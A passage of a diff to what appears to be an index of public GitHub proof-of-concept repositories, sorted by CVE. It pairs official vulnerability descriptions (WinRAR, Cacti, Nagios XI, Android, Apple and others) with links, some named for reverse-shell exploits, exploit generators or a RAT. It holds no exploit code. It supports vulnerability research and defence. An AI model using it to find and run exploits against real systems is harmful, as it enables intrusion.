[XiaomingX/cve-2023-38646-poc](https://github.com/XiaomingX/cve-2023-38646-poc) +- [JayRyz/CVE-2023-38646-PoC-Metabase](https://github.com/JayRyz/CVE-2023-38646-PoC-Metabase) + +### CVE-2023-38709 (2024-04-04) + +Faulty input validation in the core of Apache allows malicious or exploitable backend/content generators to split HTTP responses.\n\nThis issue affects Apache HTTP Server: through 2.4.58. + + +- [mrmtwoj/apache-vulnerability-testing](https://github.com/mrmtwoj/apache-vulnerability-testing) + +### CVE-2023-38743 (2023-09-11) + +Zoho ManageEngine ADManager Plus before Build 7200 allows admin users to execute commands on the host machine. + + +- [PetrusViet/CVE-2023-38743](https://github.com/PetrusViet/CVE-2023-38743) + +### CVE-2023-38817 (2023-10-11) + +An issue in Inspect Element Ltd Echo.ac v.5.2.1.0 allows a local attacker to gain privileges via a crafted command to the echo_driver.sys component. NOTE: the vendor's position is that the reported ability for user-mode applications to execute code as NT AUTHORITY\SYSTEM was "deactivated by Microsoft itself." + + +- [vxcall/kur](https://github.com/vxcall/kur) + +### CVE-2023-38820 +- [TraiLeR2/DLL-Planting-Slack-4.33.73-CVE-2023-38820](https://github.com/TraiLeR2/DLL-Planting-Slack-4.33.73-CVE-2023-38820) + +### CVE-2023-38821 +- [TraiLeR2/CoD-MW-Warzone-2---CVE-2023-38821](https://github.com/TraiLeR2/CoD-MW-Warzone-2---CVE-2023-38821) + +### CVE-2023-38822 +- [TraiLeR2/Corsair---DLL-Planting-CVE-2023-38822](https://github.com/TraiLeR2/Corsair---DLL-Planting-CVE-2023-38822) + +### CVE-2023-38829 (2023-09-11) + +An issue in NETIS SYSTEMS WF2409E v.3.6.42541 allows a remote attacker to execute arbitrary code via the ping and traceroute functions of the diagnostic tools component in the admin management interface. + + +- [adhikara13/CVE-2023-38829-NETIS-WF2409E](https://github.com/adhikara13/CVE-2023-38829-NETIS-WF2409E) + +### CVE-2023-38831 (2023-08-23) + +RARLAB WinRAR before 6.23 allows attackers to execute arbitrary code when a user attempts to view a benign file within a ZIP archive. The issue occurs because a ZIP archive may include a benign file (such as an ordinary .JPG file) and also a folder that has the same name as the benign file, and the contents of the folder (which may include executable content) are processed during an attempt to access only the benign file. This was exploited in the wild in April through October 2023. + + +- [BoredHackerBlog/winrar_CVE-2023-38831_lazy_poc](https://github.com/BoredHackerBlog/winrar_CVE-2023-38831_lazy_poc) +- [b1tg/CVE-2023-38831-winrar-exploit](https://github.com/b1tg/CVE-2023-38831-winrar-exploit) +- [IR-HuntGuardians/CVE-2023-38831-HUNT](https://github.com/IR-HuntGuardians/CVE-2023-38831-HUNT) +- [Garck3h/cve-2023-38831](https://github.com/Garck3h/cve-2023-38831) +- [ignis-sec/CVE-2023-38831-RaRCE](https://github.com/ignis-sec/CVE-2023-38831-RaRCE) +- [HDCE-inc/CVE-2023-38831](https://github.com/HDCE-inc/CVE-2023-38831) +- [Maalfer/CVE-2023-38831_ReverseShell_Winrar-RCE](https://github.com/Maalfer/CVE-2023-38831_ReverseShell_Winrar-RCE) +- [knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831](https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831) +- [akhomlyuk/cve-2023-38831](https://github.com/akhomlyuk/cve-2023-38831) +- [PascalAsch/CVE-2023-38831-KQL](https://github.com/PascalAsch/CVE-2023-38831-KQL) +- [ahmed-fa7im/CVE-2023-38831-winrar-expoit-simple-Poc](https://github.com/ahmed-fa7im/CVE-2023-38831-winrar-expoit-simple-Poc) +- [thegr1ffyn/CVE-2023-38831](https://github.com/thegr1ffyn/CVE-2023-38831) +- [MortySecurity/CVE-2023-38831-Exploit-and-Detection](https://github.com/MortySecurity/CVE-2023-38831-Exploit-and-Detection) +- [z3r0sw0rd/CVE-2023-38831-PoC](https://github.com/z3r0sw0rd/CVE-2023-38831-PoC) +- [sh770/CVE-2023-38831](https://github.com/sh770/CVE-2023-38831) +- [BeniB3astt/CVE-2023-38831_ReverseShell_Winrar](https://github.com/BeniB3astt/CVE-2023-38831_ReverseShell_Winrar) +- [MorDavid/CVE-2023-38831-Winrar-Exploit-Generator-POC](https://github.com/MorDavid/CVE-2023-38831-Winrar-Exploit-Generator-POC) +- [Mich-ele/CVE-2023-38831-winrar](https://github.com/Mich-ele/CVE-2023-38831-winrar) +- [asepsaepdin/CVE-2023-38831](https://github.com/asepsaepdin/CVE-2023-38831) +- [Fa1c0n35/CVE-2023-38831-winrar-exploit](https://github.com/Fa1c0n35/CVE-2023-38831-winrar-exploit) +- [xaitax/WinRAR-CVE-2023-38831](https://github.com/xaitax/WinRAR-CVE-2023-38831) +- [GOTonyGO/CVE-2023-38831-winrar](https://github.com/GOTonyGO/CVE-2023-38831-winrar) +- [Malwareman007/CVE-2023-38831](https://github.com/Malwareman007/CVE-2023-38831) +- [ameerpornillos/CVE-2023-38831-WinRAR-Exploit](https://github.com/ameerpornillos/CVE-2023-38831-WinRAR-Exploit) +- [an040702/CVE-2023-38831](https://github.com/an040702/CVE-2023-38831) +- [elefantesagradodeluzinfinita/cve-2023-38831](https://github.com/elefantesagradodeluzinfinita/cve-2023-38831) +- [malvika-thakur/CVE-2023-38831](https://github.com/malvika-thakur/CVE-2023-38831) +- [ruycr4ft/CVE-2023-38831](https://github.com/ruycr4ft/CVE-2023-38831) +- [Nielk74/CVE-2023-38831](https://github.com/Nielk74/CVE-2023-38831) +- [kehrijksen/CVE-2023-38831](https://github.com/kehrijksen/CVE-2023-38831) +- [h3xecute/SideCopy-Exploits-CVE-2023-38831](https://github.com/h3xecute/SideCopy-Exploits-CVE-2023-38831) +- [s4m98/winrar-cve-2023-38831-poc-gen](https://github.com/s4m98/winrar-cve-2023-38831-poc-gen) +- [xk-mt/WinRAR-Vulnerability-recurrence-tutorial](https://github.com/xk-mt/WinRAR-Vulnerability-recurrence-tutorial) +- [MyStuffYT/CVE-2023-38831-POC](https://github.com/MyStuffYT/CVE-2023-38831-POC) +- [SpamixOfficial/CVE-2023-38831](https://github.com/SpamixOfficial/CVE-2023-38831) +- [r1yaz/winDED](https://github.com/r1yaz/winDED) +- [youmulijiang/evil-winrar](https://github.com/youmulijiang/evil-winrar) +- [solomon12354/VolleyballSquid-----CVE-2023-38831-and-Bypass-UAC](https://github.com/solomon12354/VolleyballSquid-----CVE-2023-38831-and-Bypass-UAC) +- [RomainBayle08/CVE-2023-38831](https://github.com/RomainBayle08/CVE-2023-38831) +- [imbyter/imbyter-WinRAR_CVE-2023-38831](https://github.com/imbyter/imbyter-WinRAR_CVE-2023-38831) +- [UnHackerEnCapital/PDFernetRemotelo](https://github.com/UnHackerEnCapital/PDFernetRemotelo) +- [Hirusha-N/CVE-2021-34527-CVE-2023-38831-and-CVE-2023-32784](https://github.com/Hirusha-N/CVE-2021-34527-CVE-2023-38831-and-CVE-2023-32784) +- [khanhtranngoccva/cve-2023-38831-poc](https://github.com/khanhtranngoccva/cve-2023-38831-poc) +- [MaorBuskila/Windows-X64-RAT](https://github.com/MaorBuskila/Windows-X64-RAT) +- [yezzfusl/cve_2023_38831_scanner](https://github.com/yezzfusl/cve_2023_38831_scanner) +- [FirFirdaus/CVE-2023-38831](https://github.com/FirFirdaus/CVE-2023-38831) +- [ra3edAJ/LAB-DFIR-cve-2023-38831](https://github.com/ra3edAJ/LAB-DFIR-cve-2023-38831) +- [technicalcorp0/CVE-2023-38831-Exploit](https://github.com/technicalcorp0/CVE-2023-38831-Exploit) +- [idkwastaken/CVE-2023-38831](https://github.com/idkwastaken/CVE-2023-38831) +- [RonF98/CVE-2023-38831-POC](https://github.com/RonF98/CVE-2023-38831-POC) + +### CVE-2023-38836 (2023-08-21) + +File Upload vulnerability in BoidCMS v.2.0.0 allows a remote attacker to execute arbitrary code by adding a GIF header to bypass MIME type checks. + + +- [1337kid/CVE-2023-38836](https://github.com/1337kid/CVE-2023-38836) + +### CVE-2023-38840 (2023-08-15) + +Bitwarden Desktop 2023.7.0 and below allows an attacker with local access to obtain sensitive information via the Bitwarden.exe process. + + +- [markuta/bw-dump](https://github.com/markuta/bw-dump) + +### CVE-2023-38890 (2023-08-18) + +Online Shopping Portal Project 3.1 allows remote attackers to execute arbitrary SQL commands/queries via the login form, leading to unauthorized access and potential data manipulation. This vulnerability arises due to insufficient validation of user-supplied input in the username field, enabling SQL Injection attacks. + + +- [akshadjoshi/CVE-2023-38890](https://github.com/akshadjoshi/CVE-2023-38890) + +### CVE-2023-38891 (2023-09-14) + +SQL injection vulnerability in Vtiger CRM v.7.5.0 allows a remote authenticated attacker to escalate privileges via the getQueryColumnsList function in ReportRun.php. + + +- [jselliott/CVE-2023-38891](https://github.com/jselliott/CVE-2023-38891) + +### CVE-2023-39024 +- [BenTheCyberOne/CVE-2023-39024-5-POC](https://github.com/BenTheCyberOne/CVE-2023-39024-5-POC) + +### CVE-2023-39062 (2023-08-28) + +Cross Site Scripting vulnerability in Spipu HTML2PDF before v.5.2.8 allows a remote attacker to execute arbitrary code via a crafted script to the forms.php. + + +- [afine-com/CVE-2023-39062](https://github.com/afine-com/CVE-2023-39062) + +### CVE-2023-39063 (2023-09-11) + +Buffer Overflow vulnerability in RaidenFTPD 2.4.4005 allows a local attacker to execute arbitrary code via the Server name field of the Step by step setup wizard. + + +- [AndreGNogueira/CVE-2023-39063](https://github.com/AndreGNogueira/CVE-2023-39063) + +### CVE-2023-39115 (2023-08-16) + +install/aiz-uploader/upload in Campcodes Online Matrimonial Website System Script 3.3 allows XSS via a crafted SVG document. + + +- [Raj789-sec/CVE-2023-39115](https://github.com/Raj789-sec/CVE-2023-39115) + +### CVE-2023-39144 (2023-08-03) + +Element55 KnowMore appliances version 21 and older was discovered to store passwords in plaintext. + + +- [cduram/CVE-2023-39144](https://github.com/cduram/CVE-2023-39144) + +### CVE-2023-39320 (2023-09-08) + +The go.mod toolchain directive, introduced in Go 1.21, can be leveraged to execute scripts and binaries relative to the root of the module when the "go" command was executed within the module. This applies to modules downloaded using the "go" command from the module proxy, as well as modules downloaded directly using VCS software. + + +- [ayrustogaru/cve-2023-39320](https://github.com/ayrustogaru/cve-2023-39320) + +### CVE-2023-39361 (2023-09-05) + +Cacti is an open source operational monitoring and fault management framework. Affected versions are subject to a SQL injection discovered in graph_view.php. Since guest users can access graph_view.php without authentication by default, if guest users are being utilized in an enabled state, there could be the potential for significant damage. Attackers may exploit this vulnerability, and there may be possibilities for actions such as the usurpation of administrative privileges or remote code execution. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability. + + +- [HPT-Intern-Task-Submission/CVE-2023-39361](https://github.com/HPT-Intern-Task-Submission/CVE-2023-39361) + +### CVE-2023-39362 (2023-09-05) + +Cacti is an open source operational monitoring and fault management framework. In Cacti 1.2.24, under certain conditions, an authenticated privileged user, can use a malicious string in the SNMP options of a Device, performing command injection and obtaining remote code execution on the underlying server. The `lib/snmp.php` file has a set of functions, with similar behavior, that accept in input some variables and place them into an `exec` call without a proper escape or validation. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability. + + +- [m3ssap0/cacti-rce-snmp-options-vulnerable-application](https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application) +- [jakabakos/CVE-2023-39362-cacti-snmp-command-injection-poc](https://github.com/jakabakos/CVE-2023-39362-cacti-snmp-command-injection-poc) + +### CVE-2023-39526 (2023-08-07) + +PrestaShop is an open source e-commerce web application. Versions prior to 1.7.8.10, 8.0.5, and 8.1.1 are vulnerable to remote code execution through SQL injection and arbitrary file write in the back office. Versions 1.7.8.10, 8.0.5, and 8.1.1 contain a patch. There are no known workarounds. + + +- [dnkhack/fixcve2023_39526_2023_39527](https://github.com/dnkhack/fixcve2023_39526_2023_39527) + +### CVE-2023-39539 (2023-12-06) + +\nAMI AptioV contains a vulnerability in BIOS where a User may cause an unrestricted upload of a PNG Logo file with dangerous type by Local access. A successful exploit of this vulnerability may lead to a loss of Confidentiality, Integrity, and/or Availability. \n\n\n\n\n\n + + +- [AdamWen230/CVE-2023-39539-PoC](https://github.com/AdamWen230/CVE-2023-39539-PoC) + +### CVE-2023-39593 (2024-10-17) + +Insecure permissions in the sys_exec function of MariaDB v10.5 allows authenticated attackers to execute arbitrary commands with elevated privileges. NOTE: this is disputed by the MariaDB Foundation because no privilege boundary is crossed. + + +- [Ant1sec-ops/CVE-2023-39593](https://github.com/Ant1sec-ops/CVE-2023-39593) + +### CVE-2023-39707 (2023-08-25) + +A stored cross-site scripting (XSS) vulnerability in Free and Open Source Inventory Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Add Expense parameter under the Expense section. + + +- [Arajawat007/CVE-2023-39707](https://github.com/Arajawat007/CVE-2023-39707) + +### CVE-2023-39708 (2023-08-28) + +A stored cross-site scripting (XSS) vulnerability in Free and Open Source Inventory Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Add New parameter under the New Buy section. + + +- [Arajawat007/CVE-2023-39708](https://github.com/Arajawat007/CVE-2023-39708) + +### CVE-2023-39709 (2023-08-28) + +Multiple cross-site scripting (XSS) vulnerabilities in Free and Open Source Inventory Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Name, Address, and Company parameters under the Add Member section. + + +- [Arajawat007/CVE-2023-39709](https://github.com/Arajawat007/CVE-2023-39709) + +### CVE-2023-39710 (2023-09-01) + +Multiple cross-site scripting (XSS) vulnerabilities in Free and Open Source Inventory Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Name, Address, and Company parameters under the Add Customer section. + + +- [Arajawat007/CVE-2023-39710](https://github.com/Arajawat007/CVE-2023-39710) + +### CVE-2023-39711 (2023-09-07) + +Multiple cross-site scripting (XSS) vulnerabilities in Free and Open Source Inventory Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Subtotal and Paidbill parameters under the Add New Put section. + + +- [Arajawat007/CVE-2023-39711](https://github.com/Arajawat007/CVE-2023-39711) + +### CVE-2023-39712 (2023-09-08) + +Multiple cross-site scripting (XSS) vulnerabilities in Free and Open Source Inventory Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Name, Address, and Company parameters under the Add New Put section. + + +- [Arajawat007/CVE-2023-39712](https://github.com/Arajawat007/CVE-2023-39712) + +### CVE-2023-39714 (2023-09-01) + +Multiple cross-site scripting (XSS) vulnerabilities in Free and Open Source Inventory Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Name, Address, and Company parameters under the Add New Member section. + + +- [Arajawat007/CVE-2023-39714](https://github.com/Arajawat007/CVE-2023-39714) + +### CVE-2023-39725 +- [anky-123/CVE-2023-39725](https://github.com/anky-123/CVE-2023-39725) + +### CVE-2023-40000 (2024-04-16) + +Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LiteSpeed Technologies LiteSpeed Cache allows Stored XSS.This issue affects LiteSpeed Cache: from n/a through 5.7.\n\n + + +- [rxerium/CVE-2023-40000](https://github.com/rxerium/CVE-2023-40000) +- [quantiom/litespeed-cache-xss-poc](https://github.com/quantiom/litespeed-cache-xss-poc) +- [iveresk/cve-2023-40000](https://github.com/iveresk/cve-2023-40000) + +### CVE-2023-40028 (2023-08-15) + +Ghost is an open source content management system. Versions prior to 5.59.1 are subject to a vulnerability which allows authenticated users to upload files that are symlinks. This can be exploited to perform an arbitrary file read of any file on the host operating system. Site administrators can check for exploitation of this issue by looking for unknown symlinks within Ghost's `content/` folder. Version 5.59.1 contains a fix for this issue. All users are advised to upgrade. There are no known workarounds for this vulnerability. + + +- [0xyassine/CVE-2023-40028](https://github.com/0xyassine/CVE-2023-40028) + +### CVE-2023-40031 (2023-08-25) + +Notepad++ is a free and open-source source code editor. Versions 8.5.6 and prior are vulnerable to heap buffer write overflow in `Utf8_16_Read::convert`. This issue may lead to arbitrary code execution. As of time of publication, no known patches are available in existing versions of Notepad++. + + +- [webraybtl/CVE-2023-40031](https://github.com/webraybtl/CVE-2023-40031) + +### CVE-2023-40037 (2023-08-18) + +Apache NiFi 1.21.0 through 1.23.0 support JDBC and JNDI JMS access in several Processors and Controller Services with connection URL validation that does not provide sufficient protection against crafted inputs. An authenticated and authorized user can bypass connection URL validation using custom input formatting. The resolution enhances connection URL validation and introduces validation for additional related properties. Upgrading to Apache NiFi 1.23.1 is the recommended mitigation.\n + + +- [mbadanoiu/CVE-2023-40037](https://github.com/mbadanoiu/CVE-2023-40037) + +### CVE-2023-40044 (2023-09-27) + +\nIn WS_FTP Server versions prior to 8.7.4 and 8.8.2, a pre-authenticated attacker could leverage a .NET deserialization vulnerability in the Ad Hoc Transfer module to execute remote commands on the underlying WS_FTP Server operating system.  \n\n + + +- [kenbuckler/WS_FTP-CVE-2023-40044](https://github.com/kenbuckler/WS_FTP-CVE-2023-40044) + +### CVE-2023-40084 (2023-12-04) + +In run of MDnsSdListener.cpp, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. + + +- [Trinadh465/platform_system_netd_AOSP10_r33_CVE-2023-40084](https://github.com/Trinadh465/platform_system_netd_AOSP10_r33_CVE-2023-40084) + +### CVE-2023-40109 (2024-02-15) + +In createFromParcel of UsbConfiguration.java, there is a possible background activity launch (BAL) due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. + + +- [uthrasri/CVE-2023-40109](https://github.com/uthrasri/CVE-2023-40109) + +### CVE-2023-40121 (2023-10-27) + +In appendEscapedSQLString of DatabaseUtils.java, there is a possible SQL injection due to unsafe deserialization. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation. + + +- [hshivhare67/platform_framework_base_AOSP6_r22_CVE-2023-40121](https://github.com/hshivhare67/platform_framework_base_AOSP6_r22_CVE-2023-40121) +- [hshivhare67/platform_framework_base_android-4.2.2_r1_CVE-2023-40121](https://github.com/hshivhare67/platform_framework_base_android-4.2.2_r1_CVE-2023-40121) + +### CVE-2023-40127 (2023-10-27) + +In multiple locations, there is a possible way to access screenshots due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. + + +- [Trinadh465/platform_packages_providers_MediaProvider_CVE-2023-40127](https://github.com/Trinadh465/platform_packages_providers_MediaProvider_CVE-2023-40127) +- [Trinadh465/CVE-2023-40127](https://github.com/Trinadh465/CVE-2023-40127) +- [saurabh2088/platform_packages_providers_MediaProvider_CVE-2023-40127](https://github.com/saurabh2088/platform_packages_providers_MediaProvider_CVE-2023-40127) +- [RenukaSelvar/platform_packages_providers_MediaProvider_CVE-2023-40127](https://github.com/RenukaSelvar/platform_packages_providers_MediaProvider_CVE-2023-40127) +- [RenukaSelvar/packages_providers_MediaProvider_CVE-2023-40127](https://github.com/RenukaSelvar/packages_providers_MediaProvider_CVE-2023-40127) + +### CVE-2023-40133 (2023-10-27) + +In multiple locations of DialogFillUi.java, there is a possible way to view another user's images due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. + + +- [uthrasri/frame_CVE-2023-40133_136_137](https://github.com/uthrasri/frame_CVE-2023-40133_136_137) + +### CVE-2023-40140 (2023-10-27) + +In android_view_InputDevice_create of android_view_InputDevice.cpp, there is a possible way to execute arbitrary code due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. + + +- [hshivhare67/platform_frameworks_base_android-4.2.2_r1_CVE-2023-40140](https://github.com/hshivhare67/platform_frameworks_base_android-4.2.2_r1_CVE-2023-40140) +- [hshivhare67/platform_frameworks_base_AOSP6_r22_CVE-2023-40140](https://github.com/hshivhare67/platform_frameworks_base_AOSP6_r22_CVE-2023-40140) + +### CVE-2023-40275 (2024-03-19) + +An issue was discovered in OpenClinic GA 5.247.01. It allows retrieval of patient lists via queries such as findFirstname= to _common/search/searchByAjax/patientslistShow.jsp. + + +- [BugBountyHunterCVE/CVE-2023-40275](https://github.com/BugBountyHunterCVE/CVE-2023-40275) + +### CVE-2023-40276 (2024-03-19) + +An issue was discovered in OpenClinic GA 5.247.01. An Unauthenticated File Download vulnerability has been discovered in pharmacy/exportFile.jsp. + + +- [BugBountyHunterCVE/CVE-2023-40276](https://github.com/BugBountyHunterCVE/CVE-2023-40276) + +### CVE-2023-40277 (2024-03-19) + +An issue was discovered in OpenClinic GA 5.247.01. A Reflected Cross-Site Scripting (XSS) vulnerability has been discovered in the login.jsp message parameter. + + +- [BugBountyHunterCVE/CVE-2023-40277](https://github.com/BugBountyHunterCVE/CVE-2023-40277) + +### CVE-2023-40278 (2024-03-19) + +An issue was discovered in OpenClinic GA 5.247.01. An Information Disclosure vulnerability has been identified in the printAppointmentPdf.jsp component of OpenClinic GA. By changing the AppointmentUid parameter, an attacker can determine whether a specific appointment exists based on the error message. + + +- [BugBountyHunterCVE/CVE-2023-40278](https://github.com/BugBountyHunterCVE/CVE-2023-40278) + +### CVE-2023-40279 (2024-03-19) + +An issue was discovered in OpenClinic GA 5.247.01. An attacker can perform a directory path traversal via the Page parameter in a GET request to main.do. + + +- [BugBountyHunterCVE/CVE-2023-40279](https://github.com/BugBountyHunterCVE/CVE-2023-40279) + +### CVE-2023-40280 (2024-03-19) + +An issue was discovered in OpenClinic GA 5.247.01. An attacker can perform a directory path traversal via the Page parameter in a GET request to popup.jsp. + + +- [BugBountyHunterCVE/CVE-2023-40280](https://github.com/BugBountyHunterCVE/CVE-2023-40280) + +### CVE-2023-40294 (2023-08-14) + +libboron in Boron 2.0.8 has a heap-based buffer overflow in ur_parseBlockI at i_parse_blk.c. + + +- [Halcy0nic/CVE-2023-40294-and-CVE-2023-40295](https://github.com/Halcy0nic/CVE-2023-40294-and-CVE-2023-40295) + +### CVE-2023-40296 (2023-08-14) + +async-sockets-cpp through 0.3.1 has a stack-based buffer overflow in ReceiveFrom and Receive in udpsocket.hpp when processing malformed UDP packets. + + +- [Halcy0nic/CVE-2023-40296](https://github.com/Halcy0nic/CVE-2023-40296) + +### CVE-2023-40297 (-) + +Stakater Forecastle 1.0.139 and before allows %5C../ directory traversal in the website component. + + +- [sahar042/CVE-2023-40297](https://github.com/sahar042/CVE-2023-40297) + +### CVE-2023-40361 (2023-10-20) + +SECUDOS Qiata (DOMOS OS) 4.13 has Insecure Permissions for the previewRm.sh daily cronjob. To exploit this, an attacker needs access as a low-privileged user to the underlying DOMOS system. Every user on the system has write permission for previewRm.sh, which is executed by the root user. + + +- [vianic/CVE-2023-40361](https://github.com/vianic/CVE-2023-40361) + +### CVE-2023-40362 (2024-01-12) + +An issue was discovered in CentralSquare Click2Gov Building Permit before October 2023. Lack of access control protections allows remote attackers to arbitrarily delete the contractors from any user's account when the user ID and contractor information is known. + + +- [ally-petitt/CVE-2023-40362](https://github.com/ally-petitt/CVE-2023-40362) + +### CVE-2023-40404 (2023-10-25) + +A use-after-free issue was addressed with improved memory management. This issue is fixed in macOS Sonoma 14.1. An app may be able to execute arbitrary code with kernel privileges. + + +- [geniuszlyy/GenEtherExploit](https://github.com/geniuszlyy/GenEtherExploit) + +### CVE-2023-40429 (2023-09-26) + +A permissions issue was addressed with improved validation. This issue is fixed in tvOS 17, iOS 17 and iPadOS 17, watchOS 10, macOS Sonoma 14. An app may be able to access sensitive user data. + + +- [biscuitehh/cve-2023-40429-ez-device-name](https://github.com/biscuitehh/cve-2023-40429-ez-device-name) + +### CVE-2023-40459 (2023-12-04) + +\n\n\n\n\n\n\n\n\nThe\nACEManager component of ALEOS 4.16 and earlier does not adequately perform\ninput sanitization during authentication, which could potentially result in a\nDenial of Service (DoS) condition for ACEManager without impairing other router\nfunctions. ACEManager recovers from the DoS condition by restarting within ten\nseconds of becoming unavailable.\n\n\n\n\n\n\n + + +- [majidmc2/CVE-2023-40459](https://github.com/majidmc2/CVE-2023-40459) +- [7h3w4lk3r/CVE-2023-40459](https://github.com/7h3w4lk3r/CVE-2023-40459) + +### CVE-2023-40477 (2024-05-03) + +RARLAB WinRAR Recovery Volume Improper Validation of Array Index Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of RARLAB WinRAR. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the processing of recovery volumes. The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-21233. + + +- [winkler-winsen/Scan_WinRAR](https://github.com/winkler-winsen/Scan_WinRAR) +- [wildptr-io/Winrar-CVE-2023-40477-POC](https://github.com/wildptr-io/Winrar-CVE-2023-40477-POC) + +### CVE-2023-40600 (2023-11-30) + +Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Exactly WWW EWWW Image Optimizer. It works only when debug.log is turned on.This issue affects EWWW Image Optimizer: from n/a through 7.2.0.\n\n + + +- [RandomRobbieBF/CVE-2023-40600](https://github.com/RandomRobbieBF/CVE-2023-40600) + +### CVE-2023-40626 (2023-11-29) + +The language file parsing process could be manipulated to expose environment variables. Environment variables might contain sensible information. + + +- [TLWebdesign/Joomla-3.10.12-languagehelper-hotfix](https://github.com/TLWebdesign/Joomla-3.10.12-languagehelper-hotfix) + +### CVE-2023-40868 (2023-09-14) + +Cross Site Request Forgery vulnerability in mooSocial MooSocial Software v.Demo allows a remote attacker to execute arbitrary code via the Delete Account and Deactivate functions. + + +- [MinoTauro2020/CVE-2023-40868](https://github.com/MinoTauro2020/CVE-2023-40868) + +### CVE-2023-40869 (2023-09-14) + +Cross Site Scripting vulnerability in mooSocial mooSocial Software 3.1.6 and 3.1.7 allows a remote attacker to execute arbitrary code via a crafted script to the edit_menu, copuon, and group_categorias functions. + + +- [MinoTauro2020/CVE-2023-40869](https://github.com/MinoTauro2020/CVE-2023-40869) + +### CVE-2023-40924 (2023-09-08) + +SolarView Compact < 6.00 is vulnerable to Directory Traversal. + + +- [Yobing1/CVE-2023-40924](https://github.com/Yobing1/CVE-2023-40924) + +### CVE-2023-40930 (2023-09-20) + +An issue in the directory /system/bin/blkid of Skyworth v3.0 allows attackers to perform a directory traversal via mounting the Udisk to /mnt/. + + +- [NSnidie/CVE-2023-40930](https://github.com/NSnidie/CVE-2023-40930) + +### CVE-2023-40931 (2023-09-19) + +A SQL injection vulnerability in Nagios XI from version 5.11.0 up to and including 5.11.1 allows authenticated attackers to execute arbitrary SQL commands via the ID parameter in the POST request to /nagiosxi/admin/banner_message-ajaxhelper.php + + +- [sealldeveloper/CVE-2023-40931-PoC](https://github.com/sealldeveloper/CVE-2023-40931-PoC) + +### CVE-2023-40933 (2023-09-19) + +A SQL injection vulnerability in Nagios XI v5.11.1 and below allows authenticated attackers with announcement banner configuration privileges to execute arbitrary SQL commands via the ID parameter sent to the update_banner_message() function. + + +- [sealldeveloper/CVE-2023-40933-PoC](https://github.com/sealldeveloper/CVE-2023-40933-PoC) + +### CVE-2023-40989 (2023-09-22) + +SQL injection vulnerbility in jeecgboot jeecg-boot v 3.0, 3.5.3 that allows a remote attacker to execute arbitrary code via a crafted request to the report/jeecgboot/jmreport/queryFieldBySql component. + + +- [Zone1-Z/CVE-2023-40989](https://github.com/Zone1-Z/CVE-2023-40989) + +### CVE-2023-41064 (2023-09-07) + +A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 16.6.1 and iPadOS 16.6.1, macOS Monterey 12.6.9, macOS Ventura 13.5.2, iOS 15.7.9 and iPadOS 15.7.9, macOS Big Sur 11.7.10. Processing a maliciously crafted image may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. + + +- [MrR0b0t19/vulnerabilidad-LibWebP-CVE-2023-41064](https://github.com/MrR0b0t19/vulnerabilidad-LibWebP-CVE-2023-41064) +- [MrR0b0t19/CVE-2023-41064](https://github.com/MrR0b0t19/CVE-2023-41064) +- [sarsaeroth/CVE-2023-41064-POC](https://github.com/sarsaeroth/CVE-2023-41064-POC) + +### CVE-2023-41080 (2023-08-25) + +URL Redirection to Untrusted Site ('Open Redirect') vulnerability in FORM authentication feature Apache Tomcat.This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.0.12, from 9.0.0-M1 through 9.0.79 and from 8.5.0 through 8.5.92.\n\nThe vulnerability is limited to the ROOT (default) web application. + + +- [shiomiyan/CVE-2023-41080](https://github.com/shiomiyan/CVE-2023-41080) + +### CVE-2023-41265 (2023-08-29) + +An HTTP Request Tunneling vulnerability found in Qlik Sense Enterprise for Windows for versions May 2023 Patch 3 and earlier, February 2023 Patch 7 and earlier, November 2022 Patch 10 and earlier, and August 2022 Patch 12 and earlier allows a remote attacker to elevate their privilege by tunneling HTTP requests in the raw HTTP request. This allows them to send requests that get executed by the backend server hosting the repository application. This is fixed in August 2023 IR, May 2023 Patch 4, February 2023 Patch 8, November 2022 Patch 11, and August 2022 Patch 13. + + +- [praetorian-inc/zeroqlik-detect](https://github.com/praetorian-inc/zeroqlik-detect) + +### CVE-2023-41362 (2023-08-29) + +MyBB before 1.8.36 allows Code Injection by users with certain high privileges. Templates in Admin CP intentionally use eval, and there was some validation of the input to eval, but type juggling interfered with this when using PCRE within PHP. + + +- [SorceryIE/CVE-2023-41362_MyBB_ACP_RCE](https://github.com/SorceryIE/CVE-2023-41362_MyBB_ACP_RCE) + +### CVE-2023-41425 (2023-11-07) + +Cross Site Scripting vulnerability in Wonder CMS v.3.2.0 thru v.3.4.2 allows a remote attacker to execute arbitrary code via a crafted script uploaded to the installModule component. + + +- [prodigiousMind/CVE-2023-41425](https://github.com/prodigiousMind/CVE-2023-41425) +- 